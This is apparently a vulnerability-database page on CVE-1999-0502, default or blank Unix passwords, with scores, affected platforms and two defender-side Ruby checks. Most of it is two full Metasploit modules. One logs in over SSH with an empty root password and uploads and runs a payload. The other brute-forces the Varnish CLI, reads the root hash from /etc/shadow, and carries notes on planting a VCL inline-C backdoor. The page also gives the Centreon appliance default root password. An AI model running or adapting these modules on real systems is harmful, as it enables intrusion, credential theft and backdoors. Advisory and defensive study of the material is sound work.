CVE-1999-0502
CVSS 7.5
Published: 1998-03-01 00:00:00
Revised: 2008-09-09 08:34:39

[Original] A Unix account has a default, null, blank, or missing password.


[CNNVD] Unix Account Vulnerability (CNNVD-199803-001)

A Unix account has a default, null, blank, or missing password.
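A defender-side check for the condition this entry describes, added here as an example (it is not part of the CNNVD or MITRE record): scan an /etc/shadow-style file for accounts whose password field is empty or whose entry is malformed, distinguishing them from locked accounts. The sample file content and the hash value in it are constructed.

```ruby
# Constructed /etc/shadow-style sample (the hash is a made-up placeholder).
# Field 2 is the password field: "" = no password at all, "!"/"*"/"!!" = locked,
# "$..." = hashed password. A standard entry has 9 colon-separated fields.
SAMPLE_SHADOW = <<~'SHADOW'
  root:$6$saltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
  daemon:*:19000:0:99999:7:::
  backup:!:19000:0:99999:7:::
  guest::19000:0:99999:7:::
  svc:!!:19000:0:99999:7:::
  broken:19000:0:99999:7:::
SHADOW

# Classify one entry. Returns [user, state], where state is one of
# :empty_password, :locked, :hashed, :unrecognised or :malformed.
def classify_shadow_entry(line)
  fields = line.chomp.split(':', -1)   # -1 keeps trailing empty fields
  user = fields[0]
  return [user, :malformed] unless fields.size == 9
  pw = fields[1]
  state = if pw.empty?
            :empty_password             # the CVE-1999-0502 condition
          elsif pw.start_with?('!', '*')
            :locked
          elsif pw.start_with?('$')
            :hashed
          else
            :unrecognised               # legacy DES hash or unexpected content
          end
  [user, state]
end

# Entries a defender should act on: empty password fields, plus entries that do
# not have the expected layout (a missing password field shifts every field).
def find_passwordless_accounts(shadow_text)
  shadow_text.each_line
             .reject { |l| l.strip.empty? }
             .map { |l| classify_shadow_entry(l) }
             .select { |_, state| state == :empty_password || state == :malformed }
end

if $PROGRAM_NAME == __FILE__
  find_passwordless_accounts(SAMPLE_SHADOW).each { |u, s| puts "#{u}: #{s}" }
end
```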

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.6
cpe:/o:hp:hp-ux:11 (HP-UX 11 family)
cpe:/o:sun:solaris:7.0
cpe:/o:hp:hp-ux:10.20 (HP HP-UX 10.20)
cpe:/o:redhat:linux:6.0 (Red Hat Linux 6.0)
cpe:/o:sun:solaris:2.5.1

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0502
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0502
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199803-001
(official data source) CNNVD

- Other links and resources

- Vulnerability information

Unix Account Vulnerability
High risk  Unknown
1998-03-01 00:00:00  2005-10-20 00:00:00
Remote
A Unix account has a default, null, blank, or missing password.

- Advisories and patches


- Vulnerability information (F121655)

SSH User Code Execution (PacketStormID:F121655)
2013-05-15 00:00:00
Spencer McIntyre  metasploit.com
exploit,shell
CVE-1999-0502

This Metasploit module utilizes a stager to upload a base64 encoded binary which is then decoded, chmod'ed and executed from the command shell.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ManualRanking

	include Msf::Exploit::CmdStagerBourne

	attr_accessor :ssh_socket

	def initialize
		super(
			'Name'        => 'SSH User Code Execution',
			'Description' => %q{
				This module utilizes a stager to upload a base64 encoded
				binary which is then decoded, chmod'ed and executed from
				the command shell.
			},
			'Author'      => ['Spencer McIntyre', 'Brandon Knight'],
			'References'  =>
				[
					[ 'CVE', '1999-0502'] # Weak password
				],
			'License'     => MSF_LICENSE,
			'Privileged'  => true,
			'DefaultOptions' =>
				{
					'PrependFork' => 'true',
					'EXITFUNC' => 'process'
				},
			'Payload'     =>
				{
					'Space'    => 4096,
					'BadChars' => "",
					'DisableNops' => true
				},
			'Platform'    => [ 'osx', 'linux' ],
			'Targets'     =>
				[
					[ 'Linux x86',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'linux'
						},
					],
					[ 'Linux x64',
						{
							'Arch' => ARCH_X86_64,
							'Platform' => 'linux'
						},
					],
					[ 'OSX x86',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'osx'
						},
					],
				],
			'DefaultTarget'  => 0,
			# For the CVE
			'DisclosureDate' => 'Jan 01 1999'
		)

		register_options(
			[
				OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
				OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
				OptString.new('RHOST', [ true, "The target address" ]),
				Opt::RPORT(22)
			], self.class
		)

		register_advanced_options(
			[
				OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
			]
		)
	end

	def execute_command(cmd, opts = {})
		begin
			Timeout.timeout(3) do
				self.ssh_socket.exec!("#{cmd}\n")
			end
		rescue ::Exception
		end
	end

	def do_login(ip, user, pass, port)
		opt_hash = {
			:auth_methods  => ['password', 'keyboard-interactive'],
			:msframework   => framework,
			:msfmodule     => self,
			:port          => port,
			:disable_agent => true,
			:password      => pass
		}

		opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

		begin
			self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
		rescue Rex::ConnectionError, Rex::AddressInUse
			fail_with(Exploit::Failure::Unreachable, 'Disconnected during negotiation')
		rescue Net::SSH::Disconnect, ::EOFError
			fail_with(Exploit::Failure::Disconnected, 'Timed out during negotiation')
		rescue Net::SSH::AuthenticationFailed
			fail_with(Exploit::Failure::NoAccess, 'Failed authentication')
		rescue Net::SSH::Exception => e
			fail_with(Exploit::Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
		end

		if not self.ssh_socket
			fail_with(Exploit::Failure::Unknown)
		end
		return
	end

	def exploit
		do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])

		print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
		execute_cmdstager({:linemax => 500})
	end
end
- Vulnerability information (F129674)

Varnish Cache CLI Interface Remote Code Execution (PacketStormID:F129674)
2014-12-20 00:00:00
Patrick Webster  metasploit.com
exploit,root
CVE-1999-0502,CVE-2009-2936,OSVDB-67670

This Metasploit module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce list of passwords. This Metasploit module will also attempt to read the /etc/shadow root password hash if a valid password is found. It is possible to execute code as root with a valid password, however this is not yet implemented in this module.

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'digest' # Digest::SHA256 is used to answer the CLI auth challenge
 
class Metasploit3 < Msf::Auxiliary
 
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner
 
  def initialize
    super(
      'Name'           => 'Varnish Cache CLI Interface Bruteforce Utility',
      'Description'    => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce
                           list of passwords. This module will also attempt to read the /etc/shadow root password hash
                           if a valid password is found. It is possible to execute code as root with a valid password,
                           however this is not yet implemented in this module.',
      'References'     =>
        [
          [ 'OSVDB', '67670' ],
          [ 'CVE', '2009-2936' ],
          # General
          [ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ],
          [ 'CVE', '1999-0502'] # Weak password
        ],
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE
    )
 
    register_options(
      [
        Opt::RPORT(6082),
        OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
          File.join(Msf::Config.data_directory, "wordlists", "unix_passwords.txt") ]),
      ], self.class)
 
    deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS')
  end
 
  def run_host(ip)
    connect
    res = sock.get_once(-1,3) # detect banner
    if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
      vprint_status("Varnishd CLI detected - authentication required.")
      each_user_pass { |user, pass|
        sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail.
        res = sock.get_once(-1,3) # grab challenge
        if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
          challenge = $1
          secret = pass + "\n" # newline is needed
          response = challenge + "\n" + secret + challenge + "\n"
          response = Digest::SHA256.hexdigest(response)
          sock.put("auth #{response}\n")
          res = sock.get_once(-1,3)
          if (res =~ /107 \d+/) # 107 auth
            vprint_status("FAILED: #{secret}")
          elsif (res =~ /200 \d+/) # 200 ok
            print_good("GOOD: #{secret}")

            report_auth_info(
              :host => rhost,
              :port => rport,
              :sname => ('varnishd'),
              :pass => pass,
              :proof => "#{res}",
              :source_type => "user_supplied",
              :active => true
            )

            sock.put("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} /etc/shadow\n") # only returns 1 line of any target file.
            res = sock.get_once(-1,3)
            if (res =~ /root:([\D\S]+):/) # lazy.
              if ($1[0] == "!")
                vprint_error("/etc/shadow root uid is disabled.\n")
              else
                print_good("/etc/shadow root enabled:\nroot:#{$1}:")
              end
            else
              vprint_error("Unable to read /etc/shadow?:\n#{res}\n")
            end

            break
          else
            vprint_error("Unknown response:\n#{res}\n")
          end
        end
      }
    elsif (res =~ /Varnish Cache CLI 1.0/)
      print_good("Varnishd CLI does not require authentication!")
    else
      vprint_error("Unknown response:\n#{res}\n")
    end
    disconnect
  end
end
 
=begin
 
aushack notes:
 
- varnishd typically runs as root, forked as unpriv.
- 'param.show' lists configurable options.
- 'cli_timeout' is 60 seconds. param.set cli_timeout 99999 (?) if we want to inject payload into a client thread and avoid being killed.
- 'user' is nobody. param.set user root (may have to stop/start the child to activate)
- 'group' is nogroup. param.set group root (may have to stop/start the child to activate)
- (unless varnishd is launched with -r user,group (read-only) implemented in v4, which may make priv esc fail).
- vcc_unsafe_path is on. used to 'import ../../../../file' etc.
- vcc_allow_inline_c is off. param.set vcc_allow_inline_c on to enable code execution.
- code execution notes:
 
* quotes must be escaped \"
* \n is a newline
* C{ }C denotes raw C code.
* e.g. C{ unsigned char shellcode[] = \"\xcc\"; }C
* #import <stdio.h> etc must be "newline", i.e. C{ \n#include <stdlib.h>\n dosomething(); }C (without 2x \n, include statement will not interpret correctly).
* C{ asm(\"int3\"); }C can be used for inline assembly / shellcode.
* varnishd has its own 'vcl' syntax. can't seem to inject C randomly - must fit VCL logic.
* example trigger for backdoor:
 
VCL server:
  vcl.inline foo "vcl 4.0;\nbackend b { . host = \"127.0.0.1\";  } sub vcl_recv { if (req.url ~ \"^/backd00r\") { C{ asm(\"int3\"); }C } } \n"
  vcl.use foo
  start
 
Attacker:
  telnet target 80
  GET /backd00r HTTP/1.1
  Host: 127.0.0.1
 
(... wait for child to execute debug trap INT3 / shellcode).
 
CLI protocol notes from website:
 
The CLI protocol used on the management/telnet interface is a strict request/response protocol, there are no unsolicited transmissions from the responding end.
 
Requests are whitespace separated tokens terminated by a newline (NL) character.
 
Tokens can be quoted with "..." and common backslash escape forms are accepted: (\n), (\r), (\t), (\\), (\"), (\%03o) and (\x%02x)
 
The response consists of a header which can be read as fixed format or ASCII text:
 
    1-3      %03d      Response code
    4        ' '       Space
    5-12     %8d       Length of body
    13       \n        NL character.
Followed by the number of bytes announced by the header.
 
The Responsecode is numeric shorthand for the nature of the reaction, with the following values currently defined in include/cli.h:
 
enum cli_status_e {
        CLIS_SYNTAX     = 100,
        CLIS_UNKNOWN    = 101,
        CLIS_UNIMPL     = 102,
        CLIS_TOOFEW     = 104,
        CLIS_TOOMANY    = 105,
        CLIS_PARAM      = 106,
        CLIS_OK         = 200,
        CLIS_CANT       = 300,
        CLIS_COMMS      = 400,
        CLIS_CLOSE      = 500
};
=end
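The CLI framing and the challenge/response computation described in the notes above, as an added example (not code from the module, its author, or the Varnish project): parse one CLI response frame, extract the challenge from a 107 banner, compute the reply the auth command expects, and check whether a banner shows the CLI demanding authentication. The 107 auth code is taken from the module's banner regex (it is not in the enum quoted above), and the sample banner and challenge value are constructed.

```ruby
require 'digest'

# Status codes from include/cli.h as listed above; 107 (auth) is taken from
# the module's banner regex rather than from that enum.
CLI_STATUS = {
  100 => :syntax, 101 => :unknown, 102 => :unimpl, 104 => :toofew,
  105 => :toomany, 106 => :param, 107 => :auth, 200 => :ok,
  300 => :cant, 400 => :comms, 500 => :close
}.freeze

# Parse one CLI response in the fixed format "%03d %8d\n" followed by the body.
# Returns [code, body]; raises ArgumentError on a malformed or truncated frame.
def parse_cli_response(raw)
  header = raw.byteslice(0, 13)
  m = header.match(/\A(\d{3}) ([ \d]{8})\n\z/)
  raise ArgumentError, "bad CLI header: #{header.inspect}" unless m
  code = m[1].to_i
  len  = m[2].to_i
  body = raw.byteslice(13, len)
  raise ArgumentError, 'truncated body' if body.nil? || body.bytesize < len
  [code, body]
end

# A 107 body is "<challenge>\n\nAuthentication required.\n"; the first line is
# the challenge the client has to answer.
def cli_challenge(body)
  body.lines.first.to_s.chomp
end

# The auth command expects SHA256 over: challenge NL secret challenge NL, where
# secret is the full secret-file content including its trailing newline.
def cli_auth_response(challenge, secret)
  Digest::SHA256.hexdigest("#{challenge}\n#{secret}#{challenge}\n")
end

# Defender check: does this banner show the CLI demanding authentication?
def cli_requires_auth?(raw)
  code, = parse_cli_response(raw)
  CLI_STATUS[code] == :auth
end

# Constructed sample banner in wire format (the challenge value is made up).
CHALLENGE = 'abcdefghijklmnopqrstuvwxyz012345'
BANNER_BODY = "#{CHALLENGE}\n\nAuthentication required.\n"
SAMPLE_BANNER = format("%03d %8d\n", 107, BANNER_BODY.bytesize) + BANNER_BODY

puts "auth required: #{cli_requires_auth?(SAMPLE_BANNER)}" if $PROGRAM_NAME == __FILE__
```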

- Vulnerability information

56382
Centreon Nagios Virtual Appliance Default Account
Remote / Network Access, Local / Remote Authentication Management
Loss of Integrity
Exploit Public

- Vulnerability description

By default, the Centreon Nagios Virtual Appliance installs with a default password. The 'root' account has a password of 'toor' which is publicly known and documented. This allows attackers to trivially access the program or system.

- Timeline

2007-08-08 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete